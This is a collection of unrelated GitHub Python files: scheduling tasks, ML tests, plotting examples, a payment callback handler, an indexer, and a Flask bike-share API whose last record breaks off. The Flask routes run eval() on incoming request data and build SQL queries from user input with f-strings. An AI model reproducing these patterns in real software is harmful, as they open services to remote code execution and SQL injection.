+{"seq_id":"1122852452","text":"import datetime\nfrom celery import shared_task\nimport environ\n\nfrom .models import Event, AttendeesEvents, User, RecurringPattern, EventExceptionCancelledRescheduled, StatusUsersLocations\nfrom .views_attend import get_count_event_specific\nfrom .views_events import events_list, return_date_based_pattern\nfrom .notification_manager import send_email\n\n\nenv = environ.Env()\n# reading .env file\nenviron.Env.read_env()\nemail_gmail = env(\"email_gmail\")\n\n\n@shared_task()\ndef send_1_day_reminder_attend():\n    today = datetime.datetime.now()\n    days = 1\n    days_added = datetime.timedelta(days=days)\n    date_to = today + days_added\n    # print(date_to.strftime(\"%Y-%m-%d\"))\n    attendees = AttendeesEvents.objects.filter(event_date=date_to.strftime(\"%Y-%m-%d\"))\n    list_users = []\n    for y in attendees:\n        # print(y.event_date)\n        list_users.append(y.user)\n    # print(list_users)\n    send_email(5, list_users, email_gmail, date=date_to.strftime(\"%Y-%m-%d\"))\n\n\n@shared_task()\ndef send_2_days_reminder_non_attendees():\n    today = datetime.datetime.now()\n    days = 2\n    days_added = datetime.timedelta(days=days)\n    date_from = today + days_added\n    date_from_bis = datetime.datetime(date_from.year, date_from.month, date_from.day)\n    date_to = date_from_bis + datetime.timedelta(minutes=1439)\n    events_to_check = events_list(date_from=date_from_bis, date_to=date_to)\n    for i in events_to_check:\n        distrib_date = Event.objects.get(uuid=i[1][0]['uuid'])\n        nb_benev = get_count_event_specific(distrib_date, date_to.strftime(\"%Y-%m-%d\"))\n        if distrib_date.pre_alert_non_attendees_status and distrib_date.pre_alert_non_attendees_nb_attendees > nb_benev:\n            list_users = []\n            attendees = [y.user for y in AttendeesEvents.objects.filter(event_date=date_to.strftime(\"%Y-%m-%d\"), parent_event=distrib_date)]\n            for z in StatusUsersLocations.objects.filter(distrib=distrib_date):\n                if z.user not in attendees:\n                    list_users.append(z.user)\n            # print(list_users)\n            send_email(8, list_users, email_gmail, date=date_to.strftime(\"%Y-%m-%d\"), distrib=distrib_date.name)\n\n\n@shared_task()\ndef say_hello():\n    print('bonjour')","repo_name":"tbonnard/association_benevoles","sub_path":"monespace/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"43506613340","text":"class Father:\n    def __init__(self):\n        self.fname = ''\n        self.fage = 0\n        self.ftalents = []\n\n\nclass Mother:\n    def __init__(self):\n        self.mname = ''\n        self.mage = 0\n        self.mtalents = []\n\n\nclass Child(Father, Mother):\n    def __init__(self):\n        Father.__init__(self)\n        Mother.__init__(self)\n\n\n    def getChildDetails(self):\n        self.fname = input(\"Father Name : \")\n        self.fage = int(input(\"Father Age : \"))\n        res = ''\n        while True:\n            res = input(\"Father Talents : \")\n            if res == 'x':\n                break\n            self.ftalents.append(res)\n        self.mname = input(\"Mother Name : \")\n        self.mage = int(input(\"Mother Age : \"))\n        res = ''\n        while True:\n            res = input(\"Mother Talents : \")\n            if res == 'x':\n                break\n            self.mtalents.append(res)\n        
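# --- Editor's note: illustrative sketch, not part of the original file. ---
# displayTalents() below answers "which talents do both parents share?" with
# nested loops. A set intersection expresses the same idea directly and also
# de-duplicates (toy data):
ftalents = ["singing", "chess", "cooking"]
mtalents = ["chess", "painting", "cooking"]
for talent in sorted(set(ftalents) & set(mtalents)):
    print(talent)  # prints: chess, cooking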
self.cname = input(\"Child Name : \")\n self.cage = int(input(\"Child Age : \"))\n self.cgender = input(\"Child Gender : \")\n print(\"Father\\n\", self.fname, \" \", self.fage, \" \", self.ftalents)\n print(\"Mother\\n\", self.mname, \" \", self.mage, \" \", self.mtalents)\n print(\"Child\\n\", self.cname, \" \", self.cage, \" \", self.cgender)\n\n def displayTalents(self):\n for i in self.ftalents:\n for j in self.mtalents:\n if i == j:\n print(i)\n break\n\n\na = Child()\na.getChildDetails()\na.displayTalents()\n\n\n\n\n","repo_name":"zeus-12/ED5350-lab","sub_path":"LAB_6/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8905501107","text":"\"\"\"\n- Author: Haoxin Lin\n- E-mail: linhx36@outlook.com\n- Date: 2020.11.10\n- Brief: Test NeuralNetwork with watermelon dataset 3.0α\n\"\"\"\n\nimport xlrd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom NeuralNetwork import NN\n\n# load data\ndata = xlrd.open_workbook('../WTMLDataSet_3.0alpha.xlsx')\ntable = data.sheet_by_name('WTML')\n\ndataset = []\nfor i in range(table.nrows):\n line = table.row_values(i)\n dataset.append(line)\ndataset = np.array(dataset)\n\nxs = dataset[1:, 1:-1].astype(np.float64)\nys = (dataset[1:, -1]=='是').astype(np.int32)\n\n# train a neural network to learn from watermelon dataset\nnn = NN([xs.shape[1], 16, len(set(ys))], [\"sigmoid\", \"softmax\"], lr_init=0.1, regularization=None)\nfor batch_idx in range(50000):\n nn.train(xs, ys)\n if batch_idx % 100 == 0:\n print(\"Loss = %.4f\"%nn.loss)\n\n# calculate accuracy\npreds = nn.forward(xs)\npreds = np.argmax(preds, axis=-1)\nprint(\"Accuracy: %.4f\"%np.mean(preds==ys))\n\n# plot data\npositive_xs = xs[ys==1]\nnegative_xs = xs[ys==0]\nplt.scatter(positive_xs[:, 0], positive_xs[:, 1], c='#00CED1', s=60, label='Great (positive)')\nplt.scatter(negative_xs[:, 0], negative_xs[:, 1], c='#DC143C', s=60, label='Awful (negative)')\n\n# partition\nx0, x1 = 1000, 1000\nx0, x1 = np.meshgrid(np.linspace(0, 1, x0), np.linspace(0, 1, x1))\nxs = np.concatenate([x0.reshape(1000000, 1), x1.reshape(1000000, 1)], axis=-1)\npreds = np.argmax(nn.forward(xs), axis=-1).reshape(x0.shape)\nplt.contour(x0, x1, preds, [0.5], linewidths=2, colors='m')\n\nplt.xlabel(\"x[0]: Density\")\nplt.ylabel(\"x[1]: Sugar Content\")\nplt.legend()\nplt.show()","repo_name":"HxLyn3/Machine-Learning","sub_path":"05 Neural Network/5.5/test_alpha.py","file_name":"test_alpha.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"21406073682","text":"\"\"\" Version of slider example that uses a Python function as a callback,\nwhich is transpiled to JavaScript using PScript. Read more on PScript\nhere:\n\n http://pscript.readthedocs.org\n\n\"\"\"\n\nimport numpy as np\n\nfrom bokeh. 
layouts import row, column\nfrom bokeh.plotting import figure, output_file, show, ColumnDataSource\nfrom bokeh.models import CustomJS, Slider\n\nx = np.linspace(0, 10, 500)\ny = np.sin(x)\n\nsource = ColumnDataSource(data=dict(x=x, y=y))\n\nplot = figure(y_range=(-10, 10), plot_width=400, plot_height=400)\n\nplot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)\n\ndef callback(source=source, window=None, amp=None, freq=None, phase=None, offset=None):\n data = source.data\n A, B = amp.value, offset.value\n k, phi = freq.value, phase.value\n x, y = data['x'], data['y']\n for i in range(len(x)):\n y[i] = B + A * window.Math.sin(k * x[i] + phi)\n source.change.emit()\n\n# turn our function into a CustomJS object.\n# print(callback.code) to see the generated JavaScript code\ncallback = CustomJS.from_py_func(callback)\n\namp_slider = Slider(start=0.1, end=10, value=1, step=.1,\n title=\"Amplitude\", callback=callback)\ncallback.args[\"amp\"] = amp_slider\n\nfreq_slider = Slider(start=0.1, end=10, value=1, step=.1,\n title=\"Frequency\", callback=callback)\ncallback.args[\"freq\"] = freq_slider\n\nphase_slider = Slider(start=0, end=6.4, value=0, step=.1,\n title=\"Phase\", callback=callback)\ncallback.args[\"phase\"] = phase_slider\n\noffset_slider = Slider(start=-5, end=5, value=0, step=.1,\n title=\"Offset\", callback=callback)\ncallback.args[\"offset\"] = offset_slider\n\nlayout = row(\n plot,\n column(amp_slider, freq_slider, phase_slider, offset_slider),\n)\n\noutput_file(\"python_callback.html\", title=\"python_callback.py example\")\n\nshow(layout)\n","repo_name":"saturncloud/saturn-cloud-examples","sub_path":"bokeh-examples/plotting/file/python_callback.py","file_name":"python_callback.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"29"} +{"seq_id":"22567387101","text":"# Constants\nSUBAREAS = (\n ('programación', [\n ('paradigmas', 'Paradigmas de Programación'),\n ('poo', 'Programación Orientada a Objetos'),\n ('back end', 'Back End'),\n ('patrones', 'Patrones de Diseño'),\n ]),\n ('matemáticas', [\n ('algebra', 'Algebra Lineal'),\n ('calculo', 'Calculo'),\n ('computacionales', 'Matematicas Computacionales'),\n ('estadistica', 'Probabilidad y Estadistica'),\n ]),\n ('redes', [\n ('diseño', 'Diseño de redes'),\n ('configuracion', 'Configuración de Redes'),\n ('administracion', 'Administración de Redes'),\n ]),\n ('front end', [\n ('ui', 'User Interfaces'),\n ('ux', 'User Experience'),\n ('maquetado', 'Maquetado de interfaces'),\n ]),\n ('ingles', [\n ('ingles uno', 'Ingles I'),\n ('ingles dos', 'Ingles II'),\n ('ingles tres', 'Ingles III'),\n ('ingles cuatro', 'Ingles IV'),\n ('preparación', 'Preparación TOEFL'),\n ]),\n ('bases de datos', [\n ('administracion', 'Administración de B.D.'),\n ('sql', 'SQL'),\n ('no sql', 'NoSQL'),\n ]),\n ('paralelo', [\n ('cuda', 'Cuda'),\n ('pycuda', 'PyCuda'),\n ]),\n ('imagenes', [\n ('movimiento', 'Detección de Movimiento'),\n ('objetos', 'Detección de Objetos'),\n ]),\n)\n\nTRANSLATE_DAYS = {\n \"Monday\": \"Lunes\", \n \"Tuesday\": \"Martes\", \n \"Wednesday\": \"Miercoles\", \n \"Thursday\": \"Jueves\", \n \"Friday\": \"Viernes\"\n}\n","repo_name":"EdgarGZ/Doceo","sub_path":"doceo/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12082267536","text":"import time\nimport os\nimport random\nimport 
string\nimport requests\nfrom multiprocessing.pool import ThreadPool\n\nimport plotly.graph_objects as go\n\n\ndef clear_img_folder():\n \"\"\"Clean img directory after download images\"\"\"\n path = os.path.join(os.getcwd(), 'img')\n for file in os.listdir(path):\n file_path = os.path.join(path, file)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n\nclass Timer:\n def __init__(self):\n self.start_time = None\n self.end_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n return self\n\n def __exit__(self, type, value, traceback):\n self.end_time = time.time()\n\n def get_elapsed_time(self):\n return self.end_time - self.start_time\n\n\ndef fetch_pic(num_pic):\n url = 'https://picsum.photos/400/600'\n path = os.path.join(os.getcwd(), 'img')\n for _ in range(num_pic):\n random_name = ''.join(random.choices(string.ascii_letters + string.digits, k=5))\n response = requests.get(url)\n if response.status_code == 200:\n with open(f'{path}/{random_name}.jpg', 'wb') as f:\n f.write(response.content)\n\n\nDATA_SIZE = 150\n\nnumber_workers = []\ntime_work = []\n\nfor workers in range(10, 101, 10):\n with Timer() as timer:\n with ThreadPool(workers) as pool:\n input_data = [DATA_SIZE // workers for _ in range(workers)]\n pool.map(fetch_pic, input_data)\n number_workers.append(workers)\n elapsed_time = round(timer.get_elapsed_time(), 2)\n time_work.append(elapsed_time)\n clear_img_folder()\n time.sleep(1)\n print(f\"number {workers} done\")\n\nfig = go.Figure(\n data=[go.Scatter(x=number_workers,\n y=time_work, mode='lines+markers')],\n)\nfig.show()\n","repo_name":"vsrede/ithillel_pro_python_voriekhov","sub_path":"homework_29/task_1/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6383849544","text":"from typing import Any, Dict, List, Optional, Union\n\nimport numpy as np\nfrom torch import nn\n\nfrom ..constants import COLUMN, NUMERICAL\nfrom .collator import StackCollator\n\n\nclass NumericalProcessor:\n \"\"\"\n Prepare numerical data for the model specified by \"prefix\".\n For multiple models requiring numerical data, we need to create a NumericalProcessor\n for each related model so that they will have independent input.\n \"\"\"\n\n def __init__(\n self,\n model: nn.Module,\n merge: Optional[str] = \"concat\",\n requires_column_info: bool = False,\n ):\n \"\"\"\n Parameters\n ----------\n model\n The model for which this processor would be created.\n merge\n How to merge numerical features from multiple columns in a multimodal pd.DataFrame.\n Currently, it only supports one choice:\n - concat\n Concatenate the numerical features.\n requires_column_info\n Whether to require feature column information in dataloader.\n \"\"\"\n self.prefix = model.prefix\n self.merge = merge\n self.requires_column_info = requires_column_info\n\n @property\n def numerical_key(self):\n return f\"{self.prefix}_{NUMERICAL}\"\n\n @property\n def numerical_column_prefix(self):\n return f\"{self.numerical_key}_{COLUMN}\"\n\n def collate_fn(self, numerical_column_names: List) -> Dict:\n \"\"\"\n Collate individual samples into a batch. 
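# --- Editor's note: illustrative sketch, not part of the original file. ---
# In the ThreadPool benchmark above, input_data = [DATA_SIZE // workers ...]
# silently drops the remainder: with DATA_SIZE = 150 and 40 workers each worker
# gets 150 // 40 == 3 pictures, so only 120 of the 150 are fetched. divmod()
# splits a workload evenly without losing the remainder:
def split_evenly(n_tasks, n_workers):
    base, extra = divmod(n_tasks, n_workers)
    # the first `extra` workers take one task more than the rest
    return [base + 1 if i < extra else base for i in range(n_workers)]

assert sum(split_evenly(150, 40)) == 150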
Here it stacks numerical features.\n This function will be used when creating Pytorch DataLoader.\n\n Returns\n -------\n A dictionary containing one model's collator function for numerical features.\n \"\"\"\n fn = {}\n if self.requires_column_info:\n assert numerical_column_names, \"Empty numerical column names.\"\n for col_name in numerical_column_names:\n fn[f\"{self.numerical_column_prefix}_{col_name}\"] = StackCollator()\n\n fn[self.numerical_key] = StackCollator()\n\n return fn\n\n def process_one_sample(\n self,\n numerical_features: Dict[str, float],\n ) -> Dict:\n \"\"\"\n Process one sample's numerical features.\n Here it converts numerical features to a NumPy array.\n\n Parameters\n ----------\n numerical_features\n Numerical features of one sample.\n\n Returns\n -------\n A dictionary containing the processed numerical features.\n \"\"\"\n ret = {}\n if self.requires_column_info:\n # TODO: consider moving this for loop into __init__() since each sample has the same information.\n for i, col_name in enumerate(numerical_features.keys()):\n ret[f\"{self.numerical_column_prefix}_{col_name}\"] = i\n\n if self.merge == \"concat\":\n ret[self.numerical_key] = np.array(list(numerical_features.values()), dtype=np.float32)\n else:\n raise ValueError(f\"Unknown merging type: {self.merge}\")\n\n return ret\n\n def __call__(\n self,\n numerical_features: Dict[str, float],\n feature_modalities: Dict[str, Union[int, float, list]],\n is_training: bool,\n ) -> Dict:\n \"\"\"\n Extract one sample's numerical features and customize it for a specific model.\n\n Parameters\n ----------\n numerical_features\n Numerical features of one sample.\n feature_modalities\n The modality of the feature columns.\n is_training\n Whether to do processing in the training mode. This unused flag is for the API compatibility.\n\n Returns\n -------\n A dictionary containing one sample's processed numerical features.\n \"\"\"\n return self.process_one_sample(numerical_features)\n","repo_name":"autogluon/autogluon","sub_path":"multimodal/src/autogluon/multimodal/data/process_numerical.py","file_name":"process_numerical.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"36025032085","text":"from sqlalchemy import create_engine, Column, Integer, String, Interval, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom database import Base\n\nclass Tasks(Base):\n __tablename__ = \"tasks\"\n id = Column('id', Integer, primary_key=True)\n task_name = Column('task_name', String)\n priority_level = Column('priority_level', Integer)\n length = Column('length', Integer)\n\nclass PriorityQueue(Base):\n __tablename__ = \"priority_queue\"\n id = Column('id', Integer, primary_key = True)\n task_id = Column(Integer, ForeignKey('tasks.id'))\n robot_id=Column('robot_id', Integer)\n status = Column('status', String)\n task = relationship(\"Tasks\", backref=\"queued\")","repo_name":"jadcarson/robot_queue","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1936937824","text":"import facebook\n\nfrom utils.db import db\nfrom utils.html2text_processor import html2text_processor\n\nfb_access_token = db.get('fb_access_token')\nif not fb_access_token:\n raise Exception('FB Access Token not found. 
Run authorize_fb.py first.')\n\nfb_page_id = db.get('fb_page_id')\nif not fb_page_id:\n raise Exception('FB Page ID not found. Run authorize_fb.py first.')\n\ngraph = facebook.GraphAPI(fb_access_token, version='2.5')\n\n\ndef post_fb(rss_entry):\n image = None\n for url in [link.href for link in rss_entry.links if 'image' in link.type]:\n image = url\n break\n\n result = graph.put_object(\n fb_page_id, 'feed',\n message=html2text_processor.handle(rss_entry.summary),\n link=rss_entry.link,\n picture=image,\n )\n\n pass\n","repo_name":"diraven/rss_to_socialnetworks","sub_path":"utils/post_fb.py","file_name":"post_fb.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22199795843","text":"from redsysAPI import Client\nimport json\n\nREDSYS_MERCHANT_CODE = 'your_merchant_code_here'\nREDSYS_SECRET_KEY = 'your_secret_code_here'\n\n# State if you are using the test environment (True)\n# or the real environment for payments (False)\nSANDBOX = True\n\nif request.POST.has_key('Ds_SignatureVersion'):\n # get the signature from Redsys\n Response_signature = request.POST['Ds_Signature']\n # get the encrypted parameters from Redsys\n parameters = request.POST['Ds_MerchantParameters']\n \n # Init the Redsys API with your merchant code and key:\n redsyspayment = Client(business_code=REDSYS_MERCHANT_CODE, priv_key=REDSYS_SECRET_KEY, sandbox=SANDBOX)\n \n # Calculate the signature from the parameters provided by Redsys\n signature = redsyspayment.redsys.createMerchantSignatureNotif(REDSYS_SECRET_KEY, parameters)\n \n # Check if the calculated signature equals to the one sent by Redsys:\n if signature == Response_signature:\n \n # You can trust the data in parameters... Now decode them into a dict:\n data = redsyspayment.redsys.decodeMerchantParametersJson(parameters)\n \n # Continue your processing\n # .\n # .\n # . 
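# --- Editor's note: illustrative sketch, not part of the original file. ---
# Comparing the calculated and received signatures with == (as above) can leak
# timing information. The standard library offers a constant-time comparison
# that is a drop-in replacement for the equality check:
import hmac

def signatures_match(calculated: str, received: str) -> bool:
    # compare_digest runs in time independent of where the strings differ
    return hmac.compare_digest(calculated, received)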
\n","repo_name":"javivicente/RedsysAPI","sub_path":"notification_example.py","file_name":"notification_example.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"40124091836","text":"import sys\nimport os\nimport re\nfrom collections import Counter\nfrom nltk.tokenize import word_tokenize \nimport nltk \nfrom datetime import datetime\nimport pickle\nimport math\nfrom utils import textprocessing,helpers\n\n# Loading resource files and the stopword file and save it as global variable.\nresources_path = os.path.join(os.getcwd(), 'resources')\ndata_path = os.path.join(os.getcwd(), 'data')\nstopwords_file = os.path.join(resources_path, 'stopwords_en.txt')\nstopwords = helpers.get_stopwords(stopwords_file)\n\n\ncorpus=[]\ndoc_id_list = []\n\n# Function to find the special tag words.\ndef find_fun(read,s,s1):\n res = [i for i in range(len(read)) if read.startswith(s, i)]\n res1 = [i for i in range(len(read)) if read.startswith(s1, i)]\n \n lis = []\n l1 = len(s)\n l2 = len(s1)\n \n temp = 0;\n name = \"\"\n for i in range(len(res)):\n if(temp==0):\n t = res[i]+l1\n t1 = res1[i]-1\n name =(textprocessing.remove_nonwords((read[t:t1]).lower())).strip()\n \n if(i+1!=len(res)):\n if(res[i+1]-1 - (res1[i]+l2)==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n elif(res[i+1]-1 -(res1[i]+l2) ==1 and len(read[res1[i]+l2:res[i+1]-1].strip())==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n if temp==0:\n name = textprocessing.remove_nonwords(name)\n name = (name.lower()).strip()\n if(len(name)>0):\n lis.append(name)\n name=\"\"\n else:\n t = res[i]+l1\n t1 = res1[i]-1\n \n name = (name+\" \"+textprocessing.remove_nonwords((read[t:t1]).lower()).strip()).strip()\n if(i+1!=len(res)):\n if(res[i+1]-1 - (res1[i]+l2)==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n elif(res[i+1]-1 -(res1[i]+l2) ==1 and len(read[res1[i]+l2:res[i+1]].strip())==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n else:\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=0\n else:\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=0\n \n if temp==0:\n name = textprocessing.remove_nonwords(name.lower())\n name = name.lower().strip()\n if(len(name)>0):\n lis.append(name)\n name=\"\"\n return lis\n\ndef check_data(read):\n #global variables\n global corpus\n global stopwords\n global doc_id_list\n \n # Finding the document name from each file\n t = read.find(\"\")+7\n t1 = read.find(\"/DOCNO\")-1\n doc_id = (read[t:t1].strip())\n 
doc_id_list.append(doc_id)\n\n    # combining text tag data if more than one text tag is present in the document\n    res = [i for i in range(len(read)) if read.startswith(\"<TEXT>\", i)]\n    res1 = [i for i in range(len(read)) if read.startswith(\"</TEXT>\", i)]\n    doc_text = \"\"\n    for i in range(len(res)):\n        doc_text = doc_text + read[res[i]+len(\"<TEXT>\"):res1[i]]\n    \n    person = find_fun(doc_text,\"<PERSON>\",\"</PERSON>\")\n    doc_text =doc_text.replace(\"<PERSON>\", \"\")\n    doc_text =doc_text.replace(\"</PERSON>\", \"\")\n    \n    organization = find_fun(doc_text,\"<ORGANIZATION>\",\"</ORGANIZATION>\")\n    doc_text =doc_text.replace(\"<ORGANIZATION>\", \"\")\n    doc_text =doc_text.replace(\"</ORGANIZATION>\", \"\")\n    \n    location = find_fun(doc_text,\"<LOCATION>\",\"</LOCATION>\")\n    doc_text =doc_text.replace(\"<LOCATION>\", \"\")\n    doc_text =doc_text.replace(\"</LOCATION>\", \"\")\n    \n    words = textprocessing.preprocess_text(doc_text, stopwords)\n    bag_of_words = Counter(words)\n    counts = Counter(person)\n    \n    for a in counts:\n        bag_of_words[\"P:\"+a]=counts[a]\n    counts = Counter(location)\n    \n    for a in counts:\n        bag_of_words[\"L:\"+a]=counts[a]\n    counts = Counter(organization)\n    \n    for a in counts:\n        bag_of_words[\"O:\"+a]=counts[a]\n    \n    corpus.append(bag_of_words)\n\n# function to read file\ndef readfile_func(path_to_file):\n    read = \"\"\n    list_data=[]\n    with open(path_to_file, 'r') as input:\n        for line in input:\n            if '</DOC>' in line:\n                read = read + (\"</DOC>\")\n                check_data(read)\n                read = \"\"\n            read = read + line\n\ndef main(argv):\n    # global variables\n    global corpus\n    global doc_id_list\n    \n    # Checking if arguments are not proper\n    if(len(argv)!=2):\n        print(\"--> Please check your command format\\n--> Format : python3 invidx_cons.py <collection_dir> <indexfile>\\n\")\n        return\n    \n    # If arguments are proper we will do the further processing\n    out_file = argv[1]\n    path_dir = argv[0]\n    \n    for file in os.listdir(path_dir):\n        \n        current_time = helpers.get_current_time()\n        print(\"Analysing file : \"+path_dir+\"/\"+file +\" (Start Time = \"+current_time+\" )\")\n        \n        \n        readfile_func(path_dir+\"/\"+file)\n        \n        \n        current_time = helpers.get_current_time()\n        print(\"Analysing file : \"+path_dir+\"/\"+file+\" completed ...\"+\" (End Time = \"+current_time+\" )\")\n    \n    idf = helpers.compute_idf(corpus)\n    \n    # finding normalised tf-idf for each word in the corpus\n    for doc in corpus:\n        helpers.compute_weights(idf,doc)\n        helpers.normalize(doc)\n    \n    \n    # Building inverted index\n    print(\"building inverted index ...\")\n    current_time = helpers.get_current_time()\n    print(\"Building inverted index started at \"+current_time)\n    \n    inverted_index = helpers.build_inverted_index(idf, corpus, doc_id_list)\n    \n    current_time = helpers.get_current_time()\n    print(\"Building inverted index completed at \"+current_time)\n    \n    \n    # writing data to file\n    \n    print(\"Writing data to files ...\")\n    current_time = helpers.get_current_time()\n    print(\"Writing data in files started at \"+current_time)\n    \n    file_key = open(out_file+\".dict\",\"w\")\n    \n    file_postings = open(out_file+\".idx\",\"wb\")\n    \n    \n    for word in idf.keys():\n        file_key.write(word + '\\n')\n    \n    for i in inverted_index.items():\n        pickle.dump(i,file_postings)\n    \n    \n    file_key.close()\n    file_postings.close()\n    \n    current_time = helpers.get_current_time()\n    print(\"Writing data in files completed at \"+current_time)\n    \n# main function\nif __name__ == \"__main__\":\n    print(\"indexing Data.....\")\n    main(sys.argv[1:])","repo_name":"rajatb115/Vector-Space-Retrieval","sub_path":"invidx_cons.py","file_name":"invidx_cons.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"8279847627","text":"import requests # pip install requests\nimport json\nimport urllib.request\nfrom aiogram import 
types\n\nfrom config import BALABOLA_URL\n\ndef get_congratulation(name: types.Message) -> types.Message:\n headers = {\n 'Content-Type': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/605.1.15 '\n '(KHTML, like Gecko) Version/14.1.1 Safari/605.1.15',\n 'Origin': 'https://yandex.ru',\n 'Referer': 'https://yandex.ru/',\n }\n\n payload = {\"query\": name, \"intro\": 20, \"filter\": 1}\n params = json.dumps(payload).encode('utf8')\n req = urllib.request.Request(BALABOLA_URL, data=params, headers=headers)\n response = urllib.request.urlopen(req)\n\n r = json.loads(response.read().decode('utf8'))\n\n return f\"{r['text']}\"","repo_name":"njarkih/tbot_happyny","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70077389840","text":"import sqlite3\nimport requests\nfrom tqdm import tqdm\n\nfrom flask import Flask, request\nimport json \nimport numpy as np\nimport pandas as pd\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return 'Hello World'\n\n@app.route('/stations/')\ndef route_all_stations():\n conn = make_connection()\n stations = get_all_stations(conn)\n return stations.to_json()\n\n@app.route('/stations/')\ndef route_stations_id(station_id):\n conn = make_connection()\n station = get_station_id(station_id, conn)\n return station.to_json()\n\n@app.route('/trips/')\ndef route_all_trips():\n conn = make_connection()\n trips = get_all_trips(conn)\n return trips.to_json()\n\n@app.route('/trips/')\ndef route_trip_id(trip_id):\n conn = make_connection()\n trips = get_trip_id(trip_id, conn)\n return trips.to_json()\n\n@app.route('/stations/add', methods=['POST']) \ndef route_add_station():\n # parse and transform incoming data into a tuple as we need \n data = pd.Series(eval(request.get_json(force=True)))\n data = tuple(data.fillna('').values)\n\n conn = make_connection()\n result = insert_into_stations(data, conn)\n return result\n\n@app.route('/trips/add', methods=['POST']) \ndef route_add_trips():\n # parse and transform incoming data into a tuple as we need \n data = pd.Series(eval(request.get_json(force=True)))\n data = tuple(data.fillna('').values)\n\n conn = make_connection()\n result = insert_into_trips(data, conn)\n return result\n\n@app.route('/trips/average_duration_trips')\ndef route_average_duration_trips():\n conn = make_connection()\n trips = get_avg_duration_trips(conn)\n return trips.to_json()\n\n@app.route('/trips/average_duration/')\ndef route_avg_duration_by_id(bike_id):\n conn = make_connection()\n trips = get_avg_duration_by_id(bike_id,conn)\n return trips.to_json()\n\n@app.route('/rent_activities_in_period', methods=['POST'])\ndef route_rent_activities_in_period():\n input_data = request.get_json(force=True) # Get the input as dictionary\n specified_date = input_data['period'] # Select specific items (period) from the dictionary\n\n conn = make_connection()\n query = f\"\"\"\n SELECT * FROM trips\n WHERE start_time LIKE ({'\"'+specified_date+'%'+'\"'})\"\"\"\n \n selected_data = pd.read_sql_query(query, conn)\n\n # Make the aggregate\n result = selected_data.groupby('start_station_id').agg({\n 'bikeid' : 'count', \n 'duration_minutes' : 'mean'\n })\n\n # Return the result\n return result.to_json()\n\n@app.route('/json', methods=['POST']) \ndef json_example():\n\n req = request.get_json(force=True) # Parse the incoming json data as Dictionary\n\n name = req['name']\n age = 
